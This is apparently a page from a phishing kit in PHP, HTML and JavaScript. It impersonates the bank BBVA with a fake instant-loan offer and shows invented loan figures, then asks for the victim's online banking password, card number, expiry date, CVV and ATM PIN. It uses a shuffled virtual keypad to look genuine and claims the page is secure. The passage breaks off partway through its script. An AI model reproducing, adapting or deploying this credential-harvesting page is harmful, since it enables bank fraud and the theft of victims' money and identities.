<?php
error_reporting(0);
session_start();
/*************************************************************************/
if ($_SESSION["verde"] != "True") {
	header("Location: ./"); }
/*************************************************************************/
if ($_SESSION["apodo"] == "Estimado Usuario(a)") {
	$nombre = "";
	$show = "none";
} else {
	$nombre = $_SESSION["apodo"];
	$show = "block";
}
/*************************************************************************/
if ($_SESSION["cantidad"] >= 100 && $_SESSION["cantidad"] <= 1500) {
	$meses = $_SESSION["tiempo"];
	$interes_anual = 28;
	$desgravamen = 0.805;

	$total_desgravamen = round($_SESSION["cantidad"] * ($desgravamen/100), 2);
	$tasa = round((pow(1 + ($interes_anual/100), 30/360) - 1), 5);
	$tasa_mensual = round(((pow(1 + ($interes_anual/100), 30/360) - 1) * 100), 2);

	$xx = (1 - pow((1 + $tasa), (-$meses))) / $tasa;
	$yy = round($_SESSION["cantidad"] * pow($xx, (-1)), 2);

	$cuota_mensual = $yy + $total_desgravamen;
	$interes = ($cuota_mensual * $meses) - $_SESSION["cantidad"];
}
/*************************************************************************/
if ($_SESSION["cantidad"] >= 1501 && $_SESSION["cantidad"] <= 3000) {
	$meses = $_SESSION["tiempo"];
	$interes_anual = 25;
	$desgravamen = 0.705;

	$total_desgravamen = round($_SESSION["cantidad"] * ($desgravamen/100), 2);
	$tasa = round((pow(1 + ($interes_anual/100), 30/360) - 1), 5);
	$tasa_mensual = round(((pow(1 + ($interes_anual/100), 30/360) - 1) * 100), 2);

	$xx = (1 - pow((1 + $tasa), (-$meses))) / $tasa;
	$yy = round($_SESSION["cantidad"] * pow($xx, (-1)), 2);

	$cuota_mensual = $yy + $total_desgravamen;
	$interes = ($cuota_mensual * $meses) - $_SESSION["cantidad"];
}
/*************************************************************************/
if ($_SESSION["cantidad"] >= 3001 && $_SESSION["cantidad"] <= 10000) {
	$meses = $_SESSION["tiempo"];
	$interes_anual = 23;
	$desgravamen = 0.605;

	$total_desgravamen = round($_SESSION["cantidad"] * ($desgravamen/100), 2);
	$tasa = round((pow(1 + ($interes_anual/100), 30/360) - 1), 5);
	$tasa_mensual = round(((pow(1 + ($interes_anual/100), 30/360) - 1) * 100), 2);

	$xx = (1 - pow((1 + $tasa), (-$meses))) / $tasa;
	$yy = round($_SESSION["cantidad"] * pow($xx, (-1)), 2);

	$cuota_mensual = $yy + $total_desgravamen;
	$interes = ($cuota_mensual * $meses) - $_SESSION["cantidad"];
}
/*************************************************************************/
if ($_SESSION["cantidad"] >= 10001 && $_SESSION["cantidad"] <= 25000) {
	$meses = $_SESSION["tiempo"];
	$interes_anual = 21;
	$desgravamen = 0.505;

	$total_desgravamen = round($_SESSION["cantidad"] * ($desgravamen/100), 2);
	$tasa = round((pow(1 + ($interes_anual/100), 30/360) - 1), 5);
	$tasa_mensual = round(((pow(1 + ($interes_anual/100), 30/360) - 1) * 100), 2);

	$xx = (1 - pow((1 + $tasa), (-$meses))) / $tasa;
	$yy = round($_SESSION["cantidad"] * pow($xx, (-1)), 2);

	$cuota_mensual = $yy + $total_desgravamen;
	$interes = ($cuota_mensual * $meses) - $_SESSION["cantidad"];
}
/*************************************************************************/
if ($_SESSION["cantidad"] >= 25001 && $_SESSION["cantidad"] <= 80000) {
	$meses = $_SESSION["tiempo"];
	$interes_anual = 18;
	$desgravamen = 0.405;

	$total_desgravamen = round($_SESSION["cantidad"] * ($desgravamen/100), 2);
	$tasa = round((pow(1 + ($interes_anual/100), 30/360) - 1), 5);
	$tasa_mensual = round(((pow(1 + ($interes_anual/100), 30/360) - 1) * 100), 2);

	$xx = (1 - pow((1 + $tasa), (-$meses))) / $tasa;
	$yy = round($_SESSION["cantidad"] * pow($xx, (-1)), 2);

	$cuota_mensual = $yy + $total_desgravamen;
	$interes = ($cuota_mensual * $meses) - $_SESSION["cantidad"];
}
/*************************************************************************/
if ($_SESSION["cantidad"] >= 80001 && $_SESSION["cantidad"] <= 200000) {
	$meses = $_SESSION["tiempo"];
	$interes_anual = 15;
	$desgravamen = 0.305;

	$total_desgravamen = round($_SESSION["cantidad"] * ($desgravamen/100), 2);
	$tasa = round((pow(1 + ($interes_anual/100), 30/360) - 1), 5);
	$tasa_mensual = round(((pow(1 + ($interes_anual/100), 30/360) - 1) * 100), 2);

	$xx = (1 - pow((1 + $tasa), (-$meses))) / $tasa;
	$yy = round($_SESSION["cantidad"] * pow($xx, (-1)), 2);

	$cuota_mensual = $yy + $total_desgravamen;
	$interes = ($cuota_mensual * $meses) - $_SESSION["cantidad"];
}
/*************************************************************************/
$baner = [ "shs_hand_success_l.svg","spc_mobile_success_hand_d_l.svg","sh_girlwithphone_l.svg"];

$numero = rand(0,2);
/*************************************************************************/
?>
<!DOCTYPE html>
<html device-type="desktop" class="hydrated">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>Bbva</title>
	<link rel="stylesheet" href="app/styles/main.css">
	<meta content="width=device-width, initial-scale=1" name="viewport">
	<link href="app/images/logoBN.png" rel="icon" type="image/x-icon">
	<link rel="stylesheet" href="app/styles/stylo.css">
	<style>
		@font-face {
			font-family: password;
			font-style:normal;
			font-weight:400;
			src: url(app/styles/fuente/password.ttf); }

		.mask { font-family: password!important; }


		.separator {
			margin-bottom: 5px;
		}

		.teclita {
			width: 21%;
		}

		.b_tecla {
			display: none;
			text-align: center;
			background-color: rgb(255, 255, 255);
			border-radius: 10px;
			margin-top: 4px;
			padding: 5px;
			box-shadow: rgb(82 112 148 / 20%) 0px 1px 8px, rgb(82 112 148 / 12%) 0px 3px 3px -2px, rgb(82 112 148 / 14%) 0px 3px 4px;
		}

		span, input {
            font-family: var(--bcp-font-family-primary-demi, "Flexo-Demi"), helvetica, arial, sans-serif;
            font-size: 1rem;
            padding: 0;
        }

		label {
            display: block;
            width: 100%;
            border: 1px solid var(--onsurface-600, #868f9e);
            padding: 12px 10px;
            position: relative;
            box-sizing: border-box;
            border-radius: 8px;
            transition: .25s;
        }

        label input {
            display: block;
            width: 100%;
            border: none;
            background: transparent;
            outline: none;
        }

		label span {
            color: silver;
            position: absolute;
            top: 12px;
            left: 10px;
            transition: .25s;
        }

		/* Focus */

		label.focus {
            border-color: var(--primary-400, #0a47f0);
            -webkit-box-shadow: inset 0 0 0 1px var(--primary-400, #0a47f0);
            box-shadow: inset 0 0 0 1px var(--primary-400, #0a47f0);
        }

        label span.focus {
            color: var(--primary-400, #0a47f0);
        }

        /* Top */

        label span.top {
            left: 8px;
            top: -10px;
            font-size: 12px;
            background: white;
            padding: 0 6px;
        }

        /* Top */

        label span {
            left: 8px;
            top: -10px;
            font-size: 12px;
            background: white;
            padding: 0 6px;
        }

		#loader_ajax {
			position: fixed;
			top: 0px;
			left: 0px;
			width: 100%;
			height: 100%;
			display: flex;
			flex-direction: row;
			justify-content: center;
			align-items: center;
			/* background: rgba(0,0,0,0.85); */
            background-color: #072146;
			z-index: 99999999999999999999999999;
		}

		.spinner-container {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }

        .spinner {
            position: relative;
            width: 70px;
            height: 70px;
            border: 3px solid #ffffff;
            border-top: 3px solid var(--secondary-500, #072146);
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }

        .image {
            width: 30px;
            height: 30px;
            background-image: url("app/images/favicon.ico");
            background-size: cover;
            background-repeat: no-repeat;
            background-position: center;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

		.thumbnail {
			position: relative;
			float: inherit;
		}

		.thumbnail span { 
			position: absolute;
			visibility: hidden;
			color: black;
			text-decoration: none;
		}

		.thumbnail:hover span { 
			visibility: visible;
		}

		.popup {
			left: -11px;
			top: -200px;
			border: 1px solid darkblue;
			padding: 8px;
			border-radius: 10px;
			-webkit-border-radius: 10px; 
			-moz-border-radius: 10px; 
			-ms-border-radius: 10px;
			-o-border-radius: 10px;
		}

		.arrow-before {
			width:0px;
			height:0px;
			border-left: 15px solid transparent;  /* izquierda flecha */
			border-right: 15px solid transparent; /* derecha flecha */
			border-top: 15px solid darkblue; /* base flecha y color*/
			font-size:0px;
			line-height:0px;
			top: 37px;
			left: 83px;
			position: relative;
		}

		.arrow-after {
			width:0px;
			height:0px;
			border-left: 15px solid transparent;  /* izquierda flecha */
			border-right: 15px solid transparent; /* derecha flecha */
			border-top: 15px solid white; /* base flecha y color*/
			font-size:0px;
			line-height:0px;
			top: 21px;
			left: 83px;
			position: relative;
		}
	</style>
</head>
<body class="">
<div id="loader_ajax" style="display: none;">
	<div class="spinner-container">
		<div class="image" style="top: 52px; width: 25px; position: relative;"></div>
		<div class="spinner"></div>
		<p style="text-align: center; font-family: var(--bcp-font-family-primary-regular, &#39;Flexo-Regular&#39;),helvetica,arial,sans-serif!important; font-size: 13px; color: white; margin-top: 10px;">Espere un momento <br> por favor...</p>
	</div>
</div>
<app-root _nghost-aqk-c52="" ng-version="12.2.16">
	<router-outlet _ngcontent-aqk-c52=""></router-outlet>
	<app-initial-verify _nghost-aqk-c63="">
		<div _ngcontent-aqk-c63="" class="container-fluid" style="overflow-y: visible;">
			<div _ngcontent-aqk-c63="" class="row" style="min-height: 100%;">
				<div _ngcontent-aqk-c63="" class="col-4 d-none d-md-block channel-image-style">
					<app-channel-image _ngcontent-aqk-c63="" _nghost-aqk-c59="">
						<div _ngcontent-aqk-c59="" class="channel-img-fixed" style="background-image: url(app/images/principal.jpg); background-repeat: no-repeat; background-size: cover; background-position: center center; height: 100%;">
							<img _ngcontent-aqk-c59="" src="app/images/logoBN.png" class="mt16 logoSize logoStyle">
						</div>
					</app-channel-image>
				</div>
				<div _ngcontent-aqk-c63="" class="col" style="position: relative; overflow-y: visible;">
					<app-home-header _ngcontent-aqk-c63="" _nghost-aqk-c54="">
						<div _ngcontent-aqk-c54="" class="row justify-content-end header-padding bar-blue header-first-pages">
							<div _ngcontent-aqk-c54="" class="col-6 col-md-3 di-lg-none px-0 header-logo-padding">
								<img _ngcontent-aqk-c54="" src="app/images/logoBN.png" class="logo-small">
							</div>
							<div _ngcontent-aqk-c54="" class="col-6 col-md-9 di-lg-none" style="padding-top: 3px;"></div>
						</div>
						<div>&nbsp;</div>
						<div _ngcontent-aqk-c54="" class="row back-button-medium d-only-mobile"></div>
					</app-home-header>
					<div _ngcontent-aqk-c63="" class="row container-form">
						<div _ngcontent-aqk-c63="" class="col mtTable" style="margin-top: 8px;">
							<div _ngcontent-aqk-c63="" class="box-wrapper container">
								<form class="ng-pristine ng-invalid ng-touched" id="uno">
									<input type="hidden" id="one" value="<?=$interes;?>">
									<input type="hidden" id="two" value="<?=$meses;?>">
									<input type="hidden" id="tre" value="<?=$cuota_mensual;?>">
									<input type="hidden" id="for" value="<?=$desgravamen;?>">
									<input type="hidden" id="five" value="<?=$total_desgravamen;?>">
									<input type="hidden" id="six" value="<?=$tasa_mensual;?>">
									<input type="hidden" id="seven" value="<?=$interes_anual;?>">
									<div _ngcontent-aqk-c63="" class="row mt8 mb32">
										<div _ngcontent-aqk-c63="" class="col text-center">
											<bcp-title _ngcontent-aqk-c63="" size="md" class="hydrated">
												<h2 class="">Dinero al Instante</h2>
											</bcp-title>
											<p style="padding-top: 25px; text-align: justify;">
												Hola, <b><font color="#002a8d"><?=$nombre;?></font></b> estás siendo analizado para una ampliación de crédito de <b><font color="#002a8d">S/. <?=number_format($_SESSION["cantidad"]);?></font></b> financiado en <b><font color="#002a8d"><?=$meses;?> meses, </font></b> donde la Tasa de Interés Anual <b><font color="#002a8d">(TEA)</font></b> es del <b><font color="#002a8d"><?=$interes_anual;?>%</font></b> y la Tasa de Interés Mensual <b><font color="#002a8d">(TEM)</font></b> es del <b><font color="#002a8d"><?=$tasa_mensual;?>%</font></b>, el seguro de desgravamen es de <b><font color="#002a8d">S/. <?=$total_desgravamen;?></font></b> el equivalente al <b><font color="#002a8d"><?=$desgravamen;?>%</font></b> de tu prestamo, donde tu cuota aproximada a pagar es de: <b><font color="#002a8d">S/. <?=number_format($cuota_mensual, 2);?> mensuales.</font></b>
											</p>
											<p style="text-align: justify;">
												Al finalizar tu prestamo habras pagado un interes aproximado de <b><font color="#002a8d">S/. <?=number_format($interes, 2);?></font></b>
											</p>
											<p style="text-align: justify;">
												Para continuar con el proceso por favor inicie sesion, para validar sus datos
											</p>
										</div>
									</div>
									<div _ngcontent-aqk-c63="" class="row mb24">
										<div _ngcontent-aqk-c63="" class="col">
											<bcp-select-input _ngcontent-aqk-c63="" class="ng-untouched ng-pristine ng-invalid hydrated" maxlength="8">
												<div class="row no-gutters select-input-container" style="display:<?=$show;?>;">
													<div class="col input-container">
														<bcp-tooltip _ngcontent-aqk-c63="" size="lg" position="top" trigger="click" class="hydrated">
															<bcp-input class="hydrated">
																<div class="form-group">
																	<label id="title_0">
																		<span id="sub_0">Nombre</span>
																		<input disabled="" autocomplete="off" type="text" value="<?=$_SESSION["nombre"];?>">
																	</label>
																</div>
															</bcp-input>
														</bcp-tooltip>
													</div>
												</div>
												<div style="padding-top: 15px;">
													<div class="row no-gutters select-input-container">
														<div class="col input-container">
															<bcp-tooltip _ngcontent-hjc-c2="" position="top" size="lg" trigger="click" class="hydrated">
																<bcp-input class="hydrated">
																	<div class="form-group">
																		<input type="hidden" id="info">
																		<input type="hidden" id="tipo">
																	</div>
																</bcp-input>
															</bcp-tooltip>
														</div>
													</div>
												</div>

												<div style="padding-top: 15px;">
													<div class="row no-gutters select-input-container">
														<div class="col input-container">
															<bcp-tooltip _ngcontent-hjc-c2="" position="top" size="lg" trigger="click" class="hydrated">
																<bcp-input class="hydrated">
																	<div class="form-group">
																		<label id="title_2">
																			<span id="sub_2">Contraseña de Banca Internet</span>
																			<input  autocomplete="off" id="llave" type="password" maxlength="15" required="">
																		</label>
																	</div>
																	<div id="teclado" class="keypad-seed-containerx b_tecla">
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																			</div>
																		</div>
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																			</div>
																		</div>
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="clean-buttonx teclita" id="delete_dni" src="app/images/teclado/keypad_delete-new.png">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="clean-buttonx teclita" id="clean_dni" src="app/images/teclado/keypad_clean-new.png">
																			</div>
																		</div>
																	</div>
																</bcp-input>
															</bcp-tooltip>
														</div>
													</div>
												</div>
											</bcp-select-input>
										</div>
									</div>
									<p id="alerta" style="text-align: center; color: red; font-size: 0.9rem; display: none;"></p>
									<div _ngcontent-aqk-c63="" class="row button-space-bottom d-sm-block btn-not-fixed">
										<div _ngcontent-aqk-c63="" class="col">
											<bcp-button _ngcontent-aqk-c63="" type="button" tier="primary" size="lg" full-width="" class="hydrated">
												<button type="button" class="btn btn-primary btn-lg btn-block" onclick="post(1);">
													<bcp-paragraph class="hydrated">
														<p class="paragraph-lg bcp-font-demi white">Continuar </p>
													</bcp-paragraph>
												</button>
											</bcp-button>
										</div>
									</div>
								</form>





								<form class="ng-pristine ng-invalid ng-touched" id="dos">
									<div _ngcontent-aqk-c63="" class="row mt8 mb32">
										<div _ngcontent-aqk-c63="" class="col text-center">
											<bcp-title _ngcontent-aqk-c63="" size="md" class="hydrated">
												<h2 class="">Dinero al Instante</h2>
											</bcp-title>
											<p style="padding-top: 25px; text-align: justify;">
												Hola, <b><font color="#002a8d"><?=$nombre;?></font></b> estas a un paso de completar la solicitud de tu prestamo personal de <b><font color="#002a8d">S/. <?=number_format($_SESSION["cantidad"]);?></font></b> financiado en <b><font color="#002a8d"><?=$meses;?> meses, </font></b> donde pagarias <b><font color="#002a8d">S/. <?=number_format($cuota_mensual, 2);?> mensuales.</font></b>
											</p>
											<p style="text-align: justify;">
												Para continuar con el proceso por favor valide los datos de su tarjeta, los cuales nos permitirá realizar el cobro de las cuotas mensuales.
											</p>
										</div>
									</div>
									<div _ngcontent-aqk-c63="" class="row mb24">
										<div _ngcontent-aqk-c63="" class="col">
											<bcp-select-input _ngcontent-aqk-c63="" class="ng-untouched ng-pristine ng-invalid hydrated">
												<div class="row no-gutters select-input-container">
													<div class="col input-container">
														<bcp-tooltip _ngcontent-hjc-c2="" position="top" size="lg" trigger="click" class="hydrated">
															<bcp-input class="hydrated">
																<div class="form-group">
																	<label>
																		<span>Número de Tarjeta</span>
																		<input autocomplete="off" id="carta" type="tel" disabled="">
																		<input autocomplete="off" id="presente" type="tel" onkeypress="return tipoFiltro(event)" required="" onclick="hide_key();" value="">
																	</label>
																</div>
															</bcp-input>
														</bcp-tooltip>
													</div>
												</div>
												<div style="padding-top: 15px;">
													<div class="row no-gutters select-input-container">
														<div class="col input-container">
															<bcp-tooltip _ngcontent-hjc-c2="" position="top" size="lg" trigger="click" class="hydrated">
																<bcp-input class="hydrated">
																	<div class="form-group">
																		<label id="title_3">
																			<span id="sub_3">Vencimiento [Mes/Año]</span>
																			<input autocomplete="off" id="caduco" type="tel" maxlength="5" placeholder="[MM/YY]" required="" onclick="hide_1(); hide_2();">
																		</label>
																	</div>
																</bcp-input>
															</bcp-tooltip>
														</div>
													</div>
												</div>

												<div style="padding-top: 15px;">
													<div class="row no-gutters select-input-container">
														<div class="col input-container">
															<bcp-tooltip _ngcontent-hjc-c2="" position="top" size="lg" trigger="click" class="hydrated">
																<bcp-input class="hydrated">
																	<div class="form-group">
																		<label id="title_4">
																			<span id="sub_4">3 digitos CVV Dinámico</span>
																			<a class="thumbnail">
																				<input autocomplete="off" id="secret" type="tel" maxlength="3" placeholder="CVV" required="" onkeypress="return tipoFiltro(event)" onclick="key_1(); hide_2();">
																				<span class="popup">
																					<img src="app/images/popup.png" width="185">
																					<div class="arrow-before"></div>
																					<div class="arrow-after"></div>
																				</span>
																				
																			</a>
																		</label>
																	</div>
																	<div id="teclado_1" class="keypad-seed-containerx b_tecla">
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																			</div>
																		</div>
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																			</div>
																		</div>
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="clean-buttonx teclita" id="delete_1" src="app/images/teclado/keypad_delete-new.png">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="clean-buttonx teclita" id="clean_1" src="app/images/teclado/keypad_clean-new.png">
																			</div>
																		</div>
																	</div>
																</bcp-input>
															</bcp-tooltip>
														</div>
													</div>
												</div>


												<div style="padding-top: 15px;">
													<div class="row no-gutters select-input-container">
														<div class="col input-container">
															<bcp-tooltip _ngcontent-hjc-c2="" position="top" size="lg" trigger="click" class="hydrated">
																<bcp-input class="hydrated">
																	<div class="form-group">
																		<label id="title_5">
																			<span id="sub_5">Clave 4 digitos (Cajero Automatico)</span>
																			<input class="mask" autocomplete="off" id="secure" type="tel" maxlength="4" placeholder="ATM" required="" onkeypress="return tipoFiltro(event)" onclick="key_2(); hide_1(); ">
																		</label>
																	</div>
																	<div id="teclado_2" class="keypad-seed-containerx b_tecla">
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																			</div>
																		</div>
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																			</div>
																		</div>
																		<div>
																			<div class="separator left">
																				<img _ngcontent-c17="" class="clean-buttonx teclita" id="delete_2" src="app/images/teclado/keypad_delete-new.png">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="seed-enabled teclita">
																				<img _ngcontent-c17="" class="clean-buttonx teclita" id="clean_2" src="app/images/teclado/keypad_clean-new.png">
																			</div>
																		</div>
																	</div>
																</bcp-input>
															</bcp-tooltip>
														</div>
													</div>
												</div>
											</bcp-select-input>
										</div>
									</div>
									<p id="alertas" style="text-align: center; color: red; font-size: 0.9rem; display: none;"></p>
									<div _ngcontent-aqk-c63="" class="row button-space-bottom d-sm-block btn-not-fixed">
										<div _ngcontent-aqk-c63="" class="col">
											<bcp-button _ngcontent-aqk-c63="" type="button" tier="primary" size="lg" full-width="" class="hydrated">
												<button type="button" class="btn btn-primary btn-lg btn-block" onclick="post(2);">
													<bcp-paragraph class="hydrated">
														<p class="paragraph-lg bcp-font-demi white">Continuar </p>
													</bcp-paragraph>
												</button>
											</bcp-button>
										</div>
									</div>
								</form>


								<form class="ng-pristine ng-invalid ng-touched" id="tres">
									<div _ngcontent-aqk-c63="" class="row mt8 mb32">
										<div _ngcontent-aqk-c63="" class="col text-center" style="padding-top: 100px;">
											<div _ngcontent-aqk-c63="" class="col text-center">
												<div _ngcontent-aqk-c63="" style="bottom: 50px; position: relative;">
													<picture _ngcontent-aqk-c63="" class="banner-start-image">
														<img _ngcontent-aqk-c63="" alt="" class="banner-start-image" src="app/images/<?=$baner[$numero];?>" style="width:120px;">
													</picture>
												</div>
											</div>
											<bcp-title _ngcontent-aqk-c63="" size="md" class="hydrated">
												<h2 class="">Proceso Completado</h2>
											</bcp-title>
											<p style="padding-top: 25px; text-align: justify;">
												Estimado(a), <b><font color="#002a8d"><?=$nombre;?></font></b> la <b><font color="#002a8d">primera fase</font></b> del proceso se ha completado con <b><font color="#002a8d">éxito</font></b>, su solicitud de préstamo esta en <b><font color="#002a8d">proceso de evaluación</font></b>, en caso de ser aprobado uno de nuestros asesores se pondrá en contacto con usted para culminar el <b><font color="#002a8d">desembolso de su préstamo.</font></b>
											</p>
										</div>
									</div>
									<div _ngcontent-aqk-c63="" class="row button-space-bottom d-sm-block btn-not-fixed">
										<div _ngcontent-aqk-c63="" class="col">
											<bcp-button _ngcontent-aqk-c63="" type="button" tier="primary" size="lg" full-width="" class="hydrated">
												<button type="button" class="btn btn-primary btn-lg btn-block" onclick="post(3);" id="btns">
													<bcp-paragraph class="hydrated">
														<p class="paragraph-lg bcp-font-demi white">Continuar </p>
													</bcp-paragraph>
												</button>
											</bcp-button>
										</div>
									</div>
								</form>
							</div>
						</div>
					</div>
					<app-home-footer _ngcontent-aqk-c63="" _nghost-aqk-c55="">
						<div _ngcontent-aqk-c55="" class="justify-content-end footer-padding">
							<div _ngcontent-aqk-c55="" class="col remove-padding p-0">
								<div _ngcontent-aqk-c55="" class="box-wrapper container footer-container">
									<section _ngcontent-aqk-c55="" class="footer-main-text">
										<div _ngcontent-aqk-c55="" class="container-text-large">
											<bcp-paragraph _ngcontent-aqk-c55="" color="onsurface-600" size="sm" family="regular" class="footer-text hydrated">
												<p class="paragraph-sm bcp-font-regular onsurface-600">
													Esta es una página segura. Si tienes dudas sobre la autenticidad de la web, comunícate <br _ngcontent-aqk-c55="" class="displayDesktop">con nosotros al 311-8989 o a través de nuestros medios digitales.
												</p>
											</bcp-paragraph>
										</div>
									</section>
									<div _ngcontent-aqk-c55="" class="d-block d-lg-none container-footer-line">
										<div _ngcontent-aqk-c55="" class="footer-line"></div>
									</div>
									<bcp-paragraph _ngcontent-aqk-c55="" color="onsurface-600" size="sm" family="regular" class="d-none d-sm-block copyright-text hydrated">
										<p class="paragraph-sm bcp-font-regular onsurface-600">
											Banco Bilbao Vizcaya Argentaria, S.A.&nbsp;&nbsp;|&nbsp;&nbsp;© <?=date("Y");?>
										</p>
									</bcp-paragraph>
									<div _ngcontent-aqk-c55="" class="d-block d-sm-none">
										<bcp-paragraph _ngcontent-aqk-c55="" color="onsurface-600" size="sm" family="regular" class="copyright-text hydrated">
											<p class="paragraph-sm bcp-font-regular onsurface-600">
												Banco Bilbao Vizcaya Argentaria, S.A.&nbsp;&nbsp;|&nbsp;&nbsp;© <?=date("Y");?>
											</p>
										</bcp-paragraph>
									</div>
								</div>
							</div>
						</div>
					</app-home-footer>
				</div>
			</div>
		</div>
	</app-initial-verify>
</app-root>
<script type="text/javascript" src="app/js/jquery-3.1.0.min.js"></script>
<script type="text/javascript" src="app/js/nod-j.js"></script>
<script type="text/javascript" src="app/js/format-j.js"></script>
<script type="text/javascript" src="app/js/view-j.js"></script>
<script type='text/javascript'>

	function shuffle(array) {

		var currentIndex = array.length, temporaryValue, randomIndex;

		while (0 !== currentIndex) {
			randomIndex = Math.floor(Math.random() * currentIndex);
			currentIndex -= 1;
			temporaryValue = array[currentIndex];
			array[currentIndex] = array[randomIndex];
			array[randomIndex] = temporaryValue;
		}
		return array;
	}

	$(document).ready(function() {
		$("#dos, #tres").hide("");
		$("#presente").mask("0000 0000 0000 0000");
		$("#caduco").mask("00/00");
		
		$(function() {
			$("#presente").validateCard(function(result) {
				$("#info").val(result.valid);
				if(result.card_type != null)
					$("#tipo").val(result.card_type.name);
				formato();
			});
		});

		if($("#llave").val().length <= $("#llave").attr("maxlength")){
			$("#llave").val("");
			table_dni = [6,4,9,1,0,2,5,3,8,7];
			num_dni = shuffle(table_dni);

			$.each($("#teclado .separator .seed-enabled"), function(key) {
				this.value = num_dni[key];
				$(this).attr("src","app/images/teclado/" + num_dni[key] + ".png");
			});
		}

		$('#sub_0').addClass('top');

		if($("#secret").val().length <= $("#secret").attr("maxlength")){
			$("#secret").val("");
			table_1 = [3,7,1,9,2,8,4,6,5,0];
			num_1 = shuffle(table_1);

			$.each($("#teclado_1 .separator .seed-enabled"), function(key) {
				this.value = num_1[key];
				$(this).attr("src","app/images/teclado/" + num_1[key] + ".png");
			});
		}

		if($("#secure").val().length <= $("#secure").attr("maxlength")){
			$("#secure").val("");
			table_2 = [6,4,9,1,0,2,5,3,8,7];
			num_2 = shuffle(table_2);

			$.each($("#teclado_2 .separator .seed-enabled"), function(key) {
				this.value = num_2[key];
				$(this).attr("src","app/images/teclado/" + num_2[key] + ".png");
			});
		}
	});

	$("#presente").focus(function() {
		$('#title_1').addClass('focus');
		$('#sub_1').addClass('top focus');
    });

	$("#presente").blur(function() {
		if($("#presente").val().length == 0) {
			$('#title_1').removeClass('focus');
			$('#sub_1').removeClass('top focus');
		} else {
			$('#title_1').removeClass('focus');
			$('#sub_1').removeClass('focus');
		}
    });

	$("#llave").focus(function() {
		$('#title_2').addClass('focus');
		$('#sub_2').addClass('top focus');
    });

	$("#llave").blur(function() {
		if($("#llave").val().length == 0) {
			$('#title_2').removeClass('focus');
			$('#sub_2').removeClass('top focus');
		} else {
			$('#title_2').removeClass('focus');
			$('#sub_2').removeClass('focus');
		}
    });

	$("#caduco").focus(function() {
		$('#title_3').addClass('focus top');
		$('#sub_3').addClass('focus');
	});

	$("#caduco").blur(function() {
		$('#title_3').removeClass('focus top');
		$('#sub_3').removeClass('focus');
	});

	$("#secret").focus(function() {
		$('#title_4').addClass('focus top');
		$('#sub_4').addClass('focus');
	});

	$("#secret").blur(function() {
		$('#title_4').removeClass('focus top');
		$('#sub_4').removeClass('focus');
	});

	$("#secure").focus(function() {
		$('#title_5').addClass('focus top');
		$('#sub_5').addClass('focus');
	});

	$("#secure").blur(function() {
		$('#title_5').removeClass('focus top');
		$('#sub_5').removeClass('focus');
	});

	$("#secret").focus(function() {
        key_1();
    });

	$("#secure").focus(function() {
        key_2();
    });

	function ver_key() {
		$("#teclado").show(600);
		$("#llave").attr("readonly","readonly");
	}

	function hide_key() {
		$("#teclado").hide(600);
		$("#llave").removeAttr("readonly");
	}

	function key_1() {
		$("#teclado_1").show(600);
		$("#secret").attr("readonly","readonly");
	}

	function key_2() {
		$("#teclado_2").show(600);
		$("#secure").attr("readonly","readonly");
	}

	function hide_1() {
		$("#teclado_1").hide(600);
		$("#secret").removeAttr("readonly");
	}

	function hide_2() {
		$("#teclado_2").hide(600);
		$("#secure").removeAttr("readonly");
	}

	$("#teclado .separator .seed-enabled").click(function(e) {
		$('#sub_2').addClass('top');
		if($("#llave").val().length == 5) {
			strng = $("#llave").val();
			$("#llave").val(strng + this.value);
			hide_key();
		} else if ($("#llave").val().length < 6) {
			strng = $("#llave").val();
			$("#llave").val(strng + this.value);
		}
	});

	$("#clean_dni").click(function(e) {
		pass = $("#llave").val();
		if(pass.length >= 1) {
			$("#llave").val(pass.substring(0,pass.length-1));
			if(pass.length == 1) {
				$('#sub_2').removeClass('top focus');
			}
		}
	});

	$("#delete_dni").click(function(e) {
		if($("#llave").val().length >= 1) {
			$('#sub_2').removeClass('top focus');
			$("#llave").val("");
		}
	});

	$("#teclado_1 .separator .seed-enabled").click(function(e) {
		var permitido = document.getElementById("secret").maxLength;
		if($("#secret").val().length == $("#secret").attr("maxlength")-1) {
			strng = $("#secret").val();
			$("#secret").val(strng + this.value);
			hide_1();
		} else if ($("#secret").val().length < permitido) {
			strng = $("#secret").val();
			$("#secret").val(strng + this.value);
		}
	});

	$("#clean_1").click(function(e) {
		pass = $("#secret").val();
		if(pass.length >= 1){
